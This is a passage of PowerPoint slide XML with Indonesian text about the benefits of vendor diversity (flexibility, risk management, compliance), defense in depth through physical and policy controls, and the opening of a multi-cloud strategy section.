              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkualitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>investasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kustomisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Vendor yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekosistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disesuaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Keberagaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempercayai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengharuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keragaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berkontribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>konsekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ketidakpatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Strategi Multi-Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Strategi multi-cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manfaat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
